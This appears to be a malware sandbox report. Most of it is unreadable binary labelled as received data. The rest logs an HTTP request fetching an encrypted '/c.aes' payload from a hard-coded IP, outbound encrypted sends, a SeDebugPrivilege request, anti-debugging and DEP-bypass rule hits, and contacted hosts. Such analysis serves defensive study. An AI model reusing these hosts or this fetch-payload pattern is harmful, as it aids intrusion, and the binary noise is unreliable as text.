^©ñ+òc™$‚ ã–_®Iì@dñëíñü†ñÇ%²ÏSxTû–¸cÅ×ÕJœ¿Ó‚8q³“tí"„9łåwrñ:3 Y4$OWŠ´g¨/ä"“Ð )œsTþ}†bíÎ6ŠþÒmß÷ŸnBOƈ3˜/iÐí‹M’'w¼.ÕFԻŏë vûQغíw ö£tŒ”yzåu»bò-émc̤T;*«ï†cØä »¬ þÃøöF˜™ÜXMD±®„l4ƘFÿÄç~xrêõ÷Îë*‘VPév+f½b»ßÑñ#Ë3€pk1³Ê§ŽUF¡"Û »æT±Éj]?•Cp*«ó[Uœ`5alNµJ&§Î]“&„Ä;Íðù*nú§[՚´÷%·xæ+¨Úâ=‡¤€oƒ»ÿͣϟ^Oz&ȤK™Îé¸kÚí¯„~ ΑñqT?Ég²wç¹s$µ‡Œ»›Óq¶¦Ì(äûìú°)“Í©öÆ1FL<l ¥vqIÿ m_ïoÜ83†>ÄßiÓx¸âõìû1s&MÉaޓ¡ÉjøFÒêãÃeÄøþl“J{|,O’Ïê•JMØ«]N¶Õ>ö “Tïì}“b_§µ×ÅKbÈÌøZù£'ùÌŸ˜CUåô,i‚íJ}`4±Å$uçõ†©ÿPãóœ€ ¬Z°–äCÓ,ù´‰’yèö¥X°ðˆM% ƒì€Ü|]äJkaù?Î>9ÐÒJ2øD¦x àiâág’5†fJ±A.³íºƒ‹–ä‡Ôµ³eæÒ±Ú û^Rh-FU͕º W¸iê›D +öWjßÄû¤Ù¯ðÓf§"~Y6Ó»aæîP.“ü6v¦ó¬ï/ «>?8Óh-sò=* Í½¢k¯¹r>jðN¾¯ÂÇ/ì 䃑c¬›~~Ÿ·¯iqŽG£POHѯhܹ,së´àk+£ &Ñv#,3Ýÿ½)2dÜÖ1j¤Þ›yÑÙÇ w¥NñܱMÃ\©"Z ûK?QdYfÛpthËÈ;Á+dÅD’8ǎwd Óãþ„ù+>h’ÄT#ÅÏþ}uÏf7±N¥Ìúl•Ñ¯!ãTjšôX¨lÄ<¹@Æw!!ÁíÛßr€:sñUå¼Ï©˜ÿ|ˆèkG' 1¹˜—°¸ãÃ$6BӞzQûe–Jɱ ê”) H¤žú‹œ¢OÇÒ|Zž›^«oÈÓzfk²õ‡¹§$`‰ùƒi»äµ ò"l¥YÇÌ;B£‚Þæ¹H“â’½’ÞHÇÿ÷è"Ÿ¬üì=ÍMä$ÿùõÉ’Ïıa!`ApŽ÷ìMùy';uµ<nÙ2…¿c,•ÏæíÝÚâ,ý„~‚š.LVY6¾ØvBôÙÿKÍæVL 7¥V!zeÁ¨`H+Ò긳5¦¶äV0 'Ä"µêÛ£#¦œ¯-âÅK¶ó®Ü¯½ !YexÙÊ%5€m2;-Ϥ$läéj¡ú3Ԑ?̓yœ½§éÓfî(·ÎœiWÖ|8¨ö™q>€Œ°–æƺùþ¨²³&›DºªÐ͟ßÆç4ed ÷«¯T±/³#ê A:h(\t"pÚ©,¢ÙF‰=ô'ÅRuÕÀŒóžˆødu¬ëiŒœb±KہÍ1r­ô[¡ód›jÉ$¨d¿³1h£*ßá}5s륺íN¹uZoïcіťé]Nhjªù²Šû¿ã*ìŒnòïlÍÍ·ãú,Þ&FÌ)´uÝmk:͓“à!v·Dâ-/C3¡Ùÿd·Î^„¥¤X÷.OVÊPÖ ml(K—1‹Å4ƒV=RýHËÆÚZ^$m½ªŸß5÷©%‹cܞ@¸ UËã·í –Iäri7j½ p2Òð*zûýIªƒ  É5¥~dÑs¢ÔþöïÎà$Z_ux®F1ÖUzô cÇ} 0’¯˜´sɅªß€]¾4/¤Ô5Euf'ó)îÙEDT¤Ãí~ðy-29噣Tk·¾=9'zk¬Ôñ· 
Data received U¢iïºi¦B[<Ç{>@—#²»VC§`7!òÂËa‚Ô’"Æd©£MFŠHÃGš1B>€¤ƒyދ HçÕ\ÛՔnTËJH‹d`³~[‰= ý©xFÄ@-\9Lƒªk¬6å$Sä„ô)ÐP9ÖæÂiH:0Ùu¨tÒU³Ö¯· NÏê)Ò8¢PûDº46<-SAc¨òé{T÷"’PR܆°üøŒ­ ¬®£ýwîò‚œ Æ«hkû”•3£\¨ÓB=OÝü“r’íá"γ˜‚$½ã_f 6à í]”WÏ$mXKê¸5kmM&<3Ʋ×€ò½¿(éÿíCÇ÷÷ P†FYÃH`zë—ôötý¥ÁUäàóƒŠ_›e£3"÷h¨ ¦€!‡˜g=IÀusbéٟ m£—¢“¬sÝy[=OA^¬¯e®n‡kç0ªÍê2]Cãzàe¡´>rÎW—ùŠ f«Þ‘-&-G?¸†O&¨«‘ÀI;rZ¨]ل1ª¡kìm}SÀ’Lõâ¬V'/ ‡‡qŽŸŠ×Xf{Wõbïâ£þYQ±é›Hµ¥_‡rv5ˆ¤³í\ã<‹Ö ÜäÇŸþ¢¯,ˆ·ä–Jdî¥`ÎE„ Š·UMôN8›{æÊU÷=!÷s©¯:ÙÂÌ;¥F«"šîp"q©U}.¦ÓN-„ñ`>sé浶Û÷VºÞ¤:cƒ)v_–Û‰ó¼B5¯Z|lŠæíUª2gYÔèGû§ÈdiÀ|ˌôqÙºæƒc ¢ÃhçΗ„)k‹Ð·ëñ¹ T¤žÙ˜“×Ä#[yˆVµŽC‘cÉyLÖÑÛ^ï§é-PªäÎnp)å0ûË X›]´÷)›aèç›è%ªûW´½=eó„uoxAÚÏ%¶®|{ߗî˜ç‘òg²RY+КT j:$•£/RI²ô`Yó•î÷Â}R3KCrH­xœà†™rýúô¿Þ Z%S½GRpP‹øvj¤3:ÎX¬áÁæc†¹Íø‘ÏK³üM’u€þ{\—:†ùÿW,5ö%¯ JYîR²ô®]R/¬äÅ:w!`–‡u}â*¾ž_Ò8_·B/6aýh¶ÈºÄŒ[WÛ}¬/³€¨ À—R:Þå]mzŒùÏ\^tx) ´»‰Çk5ÙÕç¢ã2ô΀磽ߍ*~’j\Aiêõº’à €›=®Þ\âß /呴4…B¢¸—çA½sÿ®z“<2ð`jûµ¨‚ª(_R?.1÷'öÖqLžD~Bï?G©[̱#}‡¸úÓÖ*§$Qά±_"‚ˤ[òfaÊF .­[ðÑ»º¼Âú¤lùoY¼÷ F™Þ/r+%½þ늸âþálG:]¶änÚA>ŸÇ7iw8g  ۄ~>C½;æÁÑ'0ú«­jRŸêl×¥Ñ>ó°¢]zçåuöCòù•Oª,B¶BXýsÀÿ9„ *+‰if$2 ¼OÆëäˆ6c4Ç4ÊÞ¯’Ð ­õ±•‰ 2yhû” §š‰$„îž9ÌÖôP@V«¿Û›þ(õf0  ðVÕGPöȍ4F',èæ\Mlm¶=ýÁ¨Tï•=i÷1©°æ9ÿù+gqKxá_F@”Ç­¶9ßK;/Íòüœ ì©^ó)²§y«µ…Ò®ÀÂÔ¤?@£˜Ž÷‡‡äÚw€Zµ \@˜•ˆR\ÃyØL‰«ïx2^Ÿ`<¨(a.Û/´ôÎR´È:A]±+ñóäÚ!®½G<ä((ØP!º¿2gŠî4 pÞW@ÚRÖ;=´ýÜûƒùuCðÔ6ž4SHÅG50…Uñwõ^ÚØP-¶©*:’ëúÒ2²!È°ò».õBߋ?4¡…?܏ó"앩ß”ÅÍ@%Q(wWf\çÐMd0~pbBw;"KٞœµªV¹Ýʽɬïò¡u\ƺì"ÌZŠQǽKý*²ŸÁÊ žë$Ï-î„_kðYß^|.¹é¢k#‹øN¬i$n³Ñe·'ù•µtÕ »2;ºVì¯:=Jêå¤/>¢ãyn.“&oû¦žÄ—°}Uå!« &É©ŠÓÔy®*@)Czup÷yçcè‚MŠÉ â½×A)§€ªš$5ùä8g_Bؐy0¥(ý¯LÐ þO‘¯}oåÌÉ̑Ow0'Xbà\ýo!mÄ)q¹ÄÉQ¸vY&6vzße­÷ã·SRþÕSµýÆ@¶#¼¦*±Ä3ÅPÁq‰ò :ÅÀ‹çÒEðm£ðÉøHÐ…SŒ&÷ë<EGcô³ôâ3Îðp,d$àW˜pP V&ŸOƒJN÷2ì[¢þ “IȊ»-NøuTº™”3©³¶ä¬ ’$³«)$‚>ÐöJ‘(éæ^'ñ°jK½ÕNïŠ'J¯vɌ/7HÜèŸ3¦èWïŠL|!?&Ç­úžKÇy™*.‘¾Ð¤FcøÃbòé×¾8ÎRÀ9°ôÁ°lόÙS[KüÖ¦ñLÔæ—c9w@rŒñ¾K2¶o›þ¯ùbOÙt){bWr¸~ñøNýüÝÌæûm†ûqqÄô…û>åº@Ró^Ö(ã00|‡ë’,IŒÒŎ6§u]ˆÊ­žäPP§ ^_®¼/ø ‡£._ÇËpòXùk”ùhò~L†±!ß%A‹Xíe9þºĞ'È.ÇõŒwLÑÌEÒLÒûê¥jq¦Öèuàœ00KU-Üüû:p†ØÒñ<FçgÔð÷úðüšy'à ú.E'ú>ñƒ&dá¾Gz~QýîŠÙDQ[ÀñŠY„òa®© (¶%Ý}wa÷cWÎö’Än =á]ñí1ø×3{­W ÷‹é6v¡REßjÅ©¶%6Üý3t-l1M5Pz Ø7K˜mÀÝUˆš„§UÞ:Ó°uUb@ïvè%'ùC¶ƒâÝ ÏjBBÛ;Ń!+˜£?v*+¯¢œ8V+qn¿?z¾‘¡Žà§^tƒ€•Q»Ry~ÖV &Ø0R³Ž÷:³ÔênWÀ‰Às÷fÔÄó§Ó{‹–¯þ(ÌDܶH†Á4\‹X×ѱb…‰µ²’~ !MŽdünš¾eÃxº7hL/.‡E¡£²pÐÆkm ±Ï.\öCe©ÉÜ1§½ÆÐ0}Q ”ÿ±i˜xƒ@ú~iêD «½Âäšg*òé÷~rœ=<Ô,ˆæY"èŸë|_'N Â헇կÜü8kÃ* Þ«‘ž¦ «Žt$ëXs·^C‚ð6D§&:[.}a,º½Æ—ióLàC ïÀšdW‡ÝOCó+°qØ?߇Ôç´èEt×ÙáØ, tML‰‚Î{ Ëî³@h¹¢ ûªˆ¸ÿFà1Í¡·¨íïc/AÊ¿î‰=І}~¡%bà[°S …Lóv*°ÚÓCš üVZ³Vµ‰eğ¡*úóDa‰8=žô¹ÍP;œì±=ÀxåÖ5¹ uwWñùÐ𙲱dYŽÉO¼U#·b‰(`°@eÉ£KKÖÐ 5»x/ð©Ï½É^ǃqJ·Èê}ñÉB' ³S€ý§!fiÖ]_æ»ô‹„·Ì݈õ ;+^­7µ{µOîÑdzÉùß(Þ±fO݇qEå +?bz'ÚÝ>|!š•CÚ¢”ðM=U/8†ús(óÙjˆ"¼¡õ°ßð;ƒíô[ù@œ^ÞX®öQáÂmœn*d?ÄÐ!CÇ{?ҟó¨KvËgä÷)
Data received X Pjdï-Ã>š=±ÊœŸ¾ÐÙ¥˜a¤0%”Â8Å;‰‹@ú#naËHCNe›ó¡æNÐ_/ ( ãÄ]K)ƒÍ‡û”‡†±OÂâI”£h5•\Èn9òu~«¯°ƒòCîɺɉ0(CuÏdÔ ÌOògBìX˜ñD.ŽÃh"“®ÖÆ+š¶cRœUS/ƺ୵ŒQ^¶@r¿+?ˆ?N²ò±¤£ØÓ}KB+ W³/!=­!Çâ[ÙÔÀ³ä0ÕFÿO2k`ôs±R‚òâFOà.)ŒAÈÿö—›A;ðö&6'Ÿ}7c AÄØ7Œù§A,VéËÊÊ!³•ï-üÈÅ^‰ž\ýÚ­Œç¨Ásü0P‡KàªøtåÕÊ7ÙõE½¶tS‘gwyùÿêµ7‡±¶HB5Wö¢ñQÝIËK(ðςµÒ¢LÊrÈÍþÉ¡卞~CMz ¿éƒV^,o`D ê½å½ ;n 3§˜=öÏöªjJ_9£§q&ϜËñ²]ÞÌz 7FNîR$'àg^ ¹` 5ì·ðwÌ¥WÏ‘âé^Z?;€€z*nԀ?EÅ*šŽ—]Î'÷w6N´Ú"¬v:mŸ„ìe  ”T^³v؀/P}‚šøäG0E½¸MŸ ³Â_gª˜“%§ø©g¬їa™£;1£Ö¨ ™ GV±ÃGO—vË ¬ ½MÒF' ®aÏe:¾–Kg1¥Ó襁»þï0NË:LQqx/V‘8N!6’BFtšðZ-³ñÂðuž¯“±P-‰Ü“¢˜b2çX¶»™ÚcÒLÏþ†f›ã~­I‹»yŠ`| F!GD>ºliòl|ÌüzЃ+?¢÷õAurW Záz:FÉÖúùY–ZÐD¬œdܖfž“÷|9ޅÁŠþ´×ˆ«ˆ¥-Vi#Ÿ«ðÛ&§ "=§"’òZñ¶|gwWnΧeá"»ø{;¢)¥Å~y1´U«è%x%HH=ØþdXÄaûò‘üv;Ýc$‘¸"ÖðZ…yىŽ_H!äوGfQ #ì'º¾«áȈÁ3~L£ûõ?ßnˆ)&›%õí$_þëwµŠ;u‡:[¬¢¬ßg ¶Y öólÿ­Ð‡ÝÔÏ˹⮄×9C¥’¥w#ê}W8g §7•–.8³B›¹̆—áFËpíÑ<ìˆ2pývBj5m_’žÓ3ž–á¥9_õzY2‘”<!|Ýèüࡐ&aë ±/ý8½‘’8ͽ×Eqfåöf€þ̐ I™ê¬oí{XåqIÑAªÿåò/—…MMB?ÁõQ:k€3—[ÐÇq)‘”þ[Þ‘Ò bëC>¤9ϱ(/q~&òUþm›Uaš³J”3‡%¬¶jžrM0†àµ„¯Ìþ¯£[À‚áÌÒ¡#%QÑ`<ÊD_‹žLiª ûÞ±%Š ÑÖðš><öJ® [1«=S-GqŸž¥@}©sý›û$’ʦþ ~¼’ Z Ÿg†aéƒÚhÚ«QÑòqV¡: YF«C÷¦‰ì×8I•†è‰_¦c¿GI†A¥—,ß&{øêv@ÝV˜]uHýŒ§U¿=ÒøÍ)** Õ?¼®*nQ´#x“™òž!ÞLÂzP¨Eù= è,™©}ÐÆsQ_ˆÃzÚÁ5֎®&]ïðVÓÊ Æ_±‚tÉSÃökQ¹RߔÍZÏÉzJ. <½²x Rÿ—À´àïüâ$’=çëÞ¬‹¤|ùµµëþb³xw»«øóq‹½/¯‹ö™˖œ^wۊM¼±HoËP¢'a9šÏä"­Ò¸ûÌdϤ!QuGì,9õÀ® ÷Bv„ñIî+’¤Æªn6l¥9í<¾Dût’[qÄtlÔ¨,ÒF#û»Ýتð MT°ëó¤S‚VCAhóÃÔ̾}4ñr’Œü«ƒô^›=iHyXBǓö@pÞu^‚™Lí0 >õaè·!:­ ¨æޔ—ó4H1¼Úð&˜\q˜Ïµ É@ ø U/$®>[©Õ)çÁ4?‡4ESdÈ&¾ôTW6›{ÊËùê^]YýˆPC{/ ’§ª ýÖ-æ~-*Þ¤ay‡ û÷ø’Y‹ ³º£®Ã½žOýQõ¿¤¼µþs'ä$ð¬¡kt¤ÿï_9ʁʕo$[q ƒaìˆÒ&_ÿ€{µ\r:ÛèF…Š|÷•§¥·¼cÓÏúX‘E,9Íuƒ˜x ÒEiµŠlÑȘ¨äaǧ!‘rrcùõB'Ù¾³þQaº£A¼=ÃÙ!@k±|“F£ðßËÕªS0ç¦1»FI±v¯µ´¸j"ø¨-ï²^ãàW ´C„ܧ¾zŸ‡»^ ›ª†Méå®ÀÈc=lŒ|þ0;kKþÒÂ?bœ)͓qq©xÛf4ҏ£õbÂÔ´“¨uþ>#U̞ÞVd{KQ˜XËúÐÓU‹ýÌÅ[f{›xfÊːÀ6ôç J©ÃˆcX؊«Ë9Ž×!vX‘£ýª¹“ÙÊÎÛ´Ñ̈́ÍXŒ@³§´ ¨,ö° E‰j,óÐþ•íÝþˆ`Aj¡}iÈaʸÚHýyúû÷òRõ¨‰,†«©Ö©5m7‘¨ß•$Å8gþ>­H2]€¥oþÕÕ tm3J\$w÷åâÆ±'‰à³K;`Ÿ+/kÏ휹uIº."£H;¬Úôµ†iÙ؝„ç´™ø3…àM³ËÀ¨[ǀGÒ4©ßëuЈÀœAPb¼¬ðèXA&w]bÙäTŠqÖÜà XóN)^Eaœ5Ô&ŒW-Èÿ+×IÙî ïj#}°²©©$_^ý6x穎x#Kµ6¤2©#[rüPªŽ)ê÷óóµÂ0ÅèHŽ’oÿîz[|‚"ȉrÇf£*â_'>Yû²”[–øÅΣ2^¬þbȟÕÒyêp²p˜Ó é: açè¡9Ík«h·ÿÒi¿=Aù<ÿVÉýÒ#Ác2eñAÍሬž|œ{dXî2ì2ǪÝ)ˆVƾ¾¾x#NæNû,3žºÀÿ~‘r35Ñ¿ŸöÃE`ïD1võ2<Ó,Ú\ÀüB^Y½” –ž?ÿñjςcŒsd|H˜Ò¼™ª?\§óE±`øÂ|‘"E 3SqÿÿOäI<¿iÜ2×Xp±ÑS½)Z÷qø÷ðÞÞ0ƒ ª,U¿é!Ó¥q˜ñ ¨9Ò¸Þ]{¨jF`ýì£Ç•*ÙHsÒ è"sìʳ?• ü®––,îiàn‚ãêöK~éÅï}0œqóŒråÕr~„@¹ozyšk-¾<àùËÎCœ¿ ÙÒÙlu„@«gõ›6e&¾J˜8©â«Ø&»˜eã!Cè2D×:ú€òoW„X‡Q$©hbôõâGÙ@3Š®þ ‰ p¶ðæžø§Ln="ü5 ¥Iáu·÷Ç×ü Z4£Ñ ¤ôËFz¡#HRъ8®š£ÿj¨g ›yÙG-Äñ-¥èAûÂfÎ]a¥’õr"=¡í<qqMøÚk“7Ùx< þû‰³ëÊóG¯"ôrßõLÆMS]q)s3Ք¬ë¹w=¿Ó¦^#ŸIà r¶L~$Òý&+x [-ûo¼ùCÝÌÑ>ðL$3Nkò”™mÒÀ ¢âÿü‡§™» ñ)M;%f dM»—7Ä¥à2\]Ú-*•¾&´‹óŽú
Data received ”óS7 Ätý–ÐY잏l1®§ijJÞ.¯QÓ ©¾|:µ! ‘fÒxԜ^ ¶p–w“€;2¸ë‘ÞM¢|à ‡Â|½ù„$ïÆÇ$ˆ±cx³ÀQ«w×dÂm¨ß•¥µ°9 7JÝ]7Cæ»JrWE἞tÀ»{ûj=>P÷øôI±÷ z~éJÓœONÅFw#¦ç`îYxÖØ覘êÞÓÖYñÍ=LlCÛ÷Oˆ•âÿªEŸ}H1¸ÁY¼‹–ÌþV̵<óýµQ<ùjbám—eÓq'N]gèëÛïE“„Š¬@Ɗ¼`Û@̘,• qჸzoKr % Fë›ÎCw™ w³BsMԍÖϓPbˆG„9k*žU{èʄCîñ.Ç,e£ƒX(j/UŸÜôekQ1À®Ò@êÓúÉu%v¹ýòMo« ¡6 íÛɶœYÄ?s¥×Gi¢„\j‹V¢±¢‡àzA@Ã*ì†%ô¿ °QÆÍë‰ÂÐGsý_H·=çL½ î(T$Ü 2•4Nhc,B÷>ëþÁR֔ÎY6AX“ŽH7qk±7Úî•@⫕“½á‡\çm½Œ¢Keµk«Ø__—é%]ÐR z½Ö=Ws;1s Eƒ\LŠ5Ž^p1‹n…Rn(Qñ~lè*öÜoBæõ–‘ÂïrÝÏko-ew×¥- †V3þaš9ˑöϒ6¯£KÅHç˜"’ÊB êÒa³œ|8cÙhâºØ<Žû¯]q„>Î\Ó^¥ˆ3·(®TRÙãÆTRZŸ¼Zb:øÅ*IQu "~⻼þ¼-‚²2+×÷Ñyni(H҄5„wÖØ&µ[®À<]#q}n¸@r¥¨­‚šå œDüܛÜeþÍt"t)M sÏÇÅ?y‡äUý5o»]qŠ°¶b;kÓ󡵡 ¨p‡iš'lÊ*–-8·¥PÜNr¥åbñõ;øq^~§Û4ʏ¾Â c×é[æ8óˆP™ àç{¾Ëß4‹ù…¦H°³†C¯šLØm5Î~Џ”;ϚCÃ~Ð;÷™‘‰®Ó€‡dÞÀ%M>˜‘™x‹¥°Þ™èIõòô»7͜|†¦œ­ ¡ô0Ýv´kauœ£¢6 –é÷Xq²ÉP_å[k’›Hð4RwÌHó!œBÎ9a+ef<„à3+®©½ÿÓ¥|4BőgBúʊÔHüˆô DYE]Œ„CETÈ}$ ÓE^,5¯bëgœÇÉӷōO˜k ˜Ï[4 æI-m9,h´o7)á«ö%jŒx*ðu°ñùví‘X,î@ø Ööaøœá­Pâ“(øiBêV9SÕa`}Â5‘/¹FvÝ°c´iýg‡À[ å_Y×ú?'õªË¡aÆ#‚ŸÁE$Ö5û(€ù®–9ì‘//–T]LëŸÐqÞCºóX±í—oˆ›÷T? ݈ÐrÄq£²tsakjΛ,”•€He¤~XìE?uãñQ@S9¥v§š€jᾶ›ÍJÙöñ_Âb^†¯Õ¡d>]¤D½WnÁ•¡=·kxW:~Gº2݃ž’I?Ȝ'»!ý¨È|‚R ¸G]€²{ÿÝ>̱qØè»8–é Ðxµ:›yœÊvvñ“u0>N3]‹L’ŸÎ¯<î ó0•Yêa£Å,.ÞÙ×þâ(”4« & ÒÔ]ˆ4‡Zw)ªÿ_“” É.h1Þ4µÕÂ痓£Ñ †ÉAcK¨y«Þ¦êQêOܑq¸‰2éÝ¡ÉiAìfáh¬lõJÅmQ‘Œ¿¸ ÿÙ¢ŽPïF†·”dL#À<ß#rZWr±(ل^þÑ}—&±%¨‹NÓÀG£¾¶üŒÊ¾¨DE„OÝ{£jpª~¿h-{ëŽ,Âra3$֚ëÜFí:ùc!c»îsÉÑ/â`¸<'Q¸FJ%xýzÈ}‚}¯÷%²î¬ô»Ái€0Ut×p¡áZ„‰uÞÃ[õ)T’‡…ÝÇI9ÒZFȠس”2&Ÿ‰F>˜Šóî"!(·,ÍW„ ws¥:Ÿu†X—̏¦¢Zp~ÚôH )ªúJ¯9"šÍn>ÆsOxˆ@aì—Â…v£GîoÃLJôñvlH<XÀIzÃT›iKúg¿ó®^ðMƒC°¿€xìtb ýRWm0Ô¨wåd¦kë¾øRXçÛÂøY¢ w´z•ä™ýߗ>”X$yQÚV«ü„wØ!i <À.õ áÿ¢RÊxíŒÇ«•ð½g´Û™rÿvAÛ[{ˤՌËé~snG%ð#Hc±Ü~ÿv:Ó ×öÃ÷ÆÁ©sIíÃüÒ¦­E‘FTƒúIãÐÿÕ6ƒdËð‚gäa÷É0 ®™-´a³i׊–Í—2×ñL•YÆ»ù5ŠšV±£× €¼Åó9‘é„dƒý{%1ð¸þ.¤OLë¸f¢oϳW.ó.ŒlC›w±Ï*ïSD¬cS Qk„åDîL‰^&³ôEúÒ_Ö<þŽX&_:×8€€Ã·Ç$¸ñ 9€(èü£-
Data sent GET /c.aes HTTP/1.1 Host: 212.227.245.12 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wb0pvs3w.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\dsbups9j.cmdline"
host 212.227.245.12
host 85.215.173.244
file C:\Users\test22\AppData\Local\Temp\RESB64C.tmp
file c:\Users\test22\AppData\Local\Temp\CSCB5BE.tmp
Time & API Arguments Status Return Repeated

send

 buffer: GET /c.aes HTTP/1.1 Host: 212.227.245.12 Connection: Keep-Alive
socket: 1252
sent: 69
1 69 0

WSASend

 buffer: ZVh*>¶%BiÙx–^‚÷T•|s}Ýû¿Å4z18H/5 ÀÀÀ À 28ÿ  
socket: 1292
0 0

WSASend

 buffer: FBA•Œ½~%ÜNðu&ìu/“©©-¢KÜW¸jñ F[Àvõ—+T1P)–&øß/Ÿuüzºø8=æi^ì 9Œf3Cè0ùK^‚¡Ð‰üó™ ±²x"ú(“éZ X¿ÖëOq¿“N:kˆ·#HݜJ±úsUI
socket: 1292
0 0

WSASend

 buffer: 0óØL¬ÿ¶¾x˜U²ŸhnÀ¼ëäcMvl¹n™nÌ;~ô¬> àn§Dób¹ZèFNð•A+„yV\<ä«eû÷Å'륦5pùÉ¥xÒTÈ,ë©§ê ¥ù³^運#l»<Å/a³Ji³˜#qā·Ln¹4dNT#-Ç:Lék㛠f²«Å¢‘Rþyº òIÐ?v[!_c1Âën²¨6„¯ÊёÓȾká¢ôÉ­w¹RÓlt ƒ>×LàWÓð¥K+’Äøž›S2h¹²¢^Y}ݱùt ^…üK^fmyGÄÊI­oÔ ™Î>–›¨ä™3Œ­™ëܖn¯z*ãàmïβ7Khã²Ïßä5Xy@D8lhêø^§Ûkņ]âɨ
socket: 1292
0 0

WSASend

 buffer: PÚø„\åÉλWB)æãd ŏOғ‰¨ó÷lé?F­Æ®žTùӁéi¥š¹,CÔqX?ˆp¿uƒ WŸêpö©ÔsœGjÄçRJåûS©à—ñœ@õÀÞ[gt…³uüÐJ–´O¥PR؁¸Ð›-&äbe˜xÍ%ÏJÄ©#5êÍJñßHB$²¯[Å-ÔuU<I³çä0*±‹‡é HñÞÌeZ"®b.YÚI» ™êEPè2“=öûâBýĒšX®mOC/Ö–+¦Á©ÚÀš£«\ò2®>Ž3ýÑb¥“]n¢v?‹7g³…2Ä'ô90Ò}ƒš.ë,'óÍa&n²d[ZÙRïÛ¬Ÿ¢.瀕Ïn 0$'µ`xç5pŒßÅÝ·YÑ<º\b|)w|±òGǸ¶fÀc踁'oÓ
socket: 1292
0 0

WSASend

 buffer: 0ÿìdvöš_ãsU ›è°ŽIê©VÓÂqèF*-°QÅϧ^Õ³?u©W û,ò»¦ž_­ÂÓ­êïíyÝxŽ‚‰5K,¬ zÇ4Ž§ýȕº–óiä-RòpXÞaé Cþ–‡¤F{IŒ’³ñ˜87Fÿødµǐ¾¶§Œ6=ÍÝ«Z°m_€5©{CH ißׅEÿ]žwGge[-2 ”™cîh}Ú¿fñïÑ+ a…–®p Ñâ üo%B?Zž©¯žuïÀ¦Ö/g#Y똋 É¥žúu®6¡ùÄÜlrí>WAŠþ×-ôxÖ ®*Jˋ°ÚŸm,kX™9ÔÍÊp.5Ùbñ@ë°°“`©–˜Òs±£&׆?Bkum?Bí9;ÌáÆ\n&¹Ò
socket: 1292
0 0

WSASend

 buffer: 09—I6“æŽg%ÝïF¾ÈrÉxŸªÐNK~ånm·Î‚¿¿¦ªëuâ½›_ a²
socket: 1292
0 0

WSASend

 buffer: 0mҘºò&ˊ¶C“ WäÁ"ƒÚqຏè.ý¼ðèqë¡Õ'™ºÔRdè“0p±'EôØA|ƒxƒ¢uo’ Åq·Ù‘1LâkÀ/@¶gKjn"£R+#=šÓt}NNQæá›‰¾v'Á¥®žø^àÉW8ÀvÄÀ©êÓÂDDæ{º­lSP¯¥×Fuk·kïxFÀE¬„ªà; ‡ƒÄ<7˨ %ß»ñK#%R"P¢¾þp–³ÊCŒßýɔ1bó–Í5ӈZLwŒ§Ð‘ÔáH¸Ñ{KYÈ FR"×pÉFLyÞPËsBڂŽßËJa@„åÞoZ–ã=ˆ>]hXªXF \£7Ê-ó99Åqp^¢o¤äVX¶ñOÎsºf¬öuë‹`eõÝ H?b„de—
socket: 1292
0 0

WSASend

 buffer: 0Ûǚ¥cê¦'`"ÝC»…Fli¹á¼ßvb`I%žéLy\{ªt¹Ûi‘½ov
socket: 1292
0 0

WSASend

 buffer: 0s°ƒ×K¶nˆQ;¦‡ £ûï$êiÊ­ØI×¢S¬+‹×«&¥ZcƽRšZ|SB¯ÚØb œãӐ)á—çƒS°rw²×F=À'‚/q˜1?Ž9+}vH õˆÆé]\– ¡u“Ù6Þ³Àcsi‹kb#\ñ¥ ɐ]Ô·¯ë vôøq¤ÃI¼P]ÈÀÃÝ('e Rª¡ðýÍ\;T‡§\/ÛÜ!²n½Wt¨£I®¯§Úƒ9 2Çì#žÀù©’µi÷à-Lœ9ìm^üïSÔ*€ÍÒ»Fõ<¸¸%YêaŸ‘Å.ò/£¿òª8Uâ@t»U4l­@Þ6ó,x<¾Ž¡â‡nQé@ûSj±#mº›÷¦{ˆ›¥/üš($Ugø
socket: 1292
0 0

WSASend

 buffer: 0 N£a/{Îí½!¼•_³ Àû,µrRSÍF~Ÿ+‹·ûZ\Lk¨X%ë[wص¯
socket: 1292
0 0

WSASend

 buffer: 0wšä]‡|aÝ/—µ×ž€$o2µÆr+v>¿Q„Ÿ&“îVNÀ‘cRá­à£SKl¦n4Ü" eþ ·ˆ6p}Ãû¾»i˜¶Ñ>·ë L6|(wú RŠ‚ ’TÙBa]šÍOn¸Wß 0ðÿX.^»ÊÕªΚË«‹s,îíÖäÎz8©i„R˜º&ÿî¹L48ùˆê/؃dâhìMí}ÙPXð`07S;Ê>ˆœÙã›|vœ˜8>CÕh»Û÷›Š.ÌØCHMÈÞ6èþ·^¯*=ØWwi<BÕìÞú\»sð,CgâïcQxÍk„2?):«Uéʈ—úú˜1ÜÈÜóÓép¤mé‡Ôu~½X{fËO&“Œdi+Þ vX ‚
socket: 1292
0 0

WSASend

 buffer: 0“š­ÒzP—Ñ@ñß{ÊF(û°ú/>Ôo¹o<ƒ›;û-qD¼ñ¶q%ãB‰xH
socket: 1292
0 0

WSASend

 buffer: 0÷g¨ŒyðáÒ:£€†V—Ù‘;VÌ¥ÒáKJ,¬¾Jû|›KúïüHN¿Xé¬WŒHx€\ ¥õ™/?Eìø,‘Ï‹-žŸL‹uù=Qlè95J]ŽMç‚Õ`ÚTÙÝ3ÑD`üggà$ª`u,¬ºÞ†Âo—‰<cY^;ZD}!'֑WÐ5õÉ4×\šîÝôq Ûò&lÏܸmwËçáõtê]œ'4Ùò,&ê$$FCM>on[êAʈEµf:&vZOö=‡9—×à¶×ýQ|Y;q¯x+gÉÂCaéE©a^¬äµÈŒ¾ßύRfÜ²Þ\ þeÙÁ§PTJªðd’“ꙌZÁ¦ÔnÏC}r 딑+Ÿgl%½XO‘#ç
socket: 1292
0 0

WSASend

 buffer: 0u¡ª·C@UÿKçÍÓ6F1Uè¬ïÚ3è¯)>¯a`Ôrxåâ\#Õ]I'{½Ð
socket: 1292
0 0

WSASend

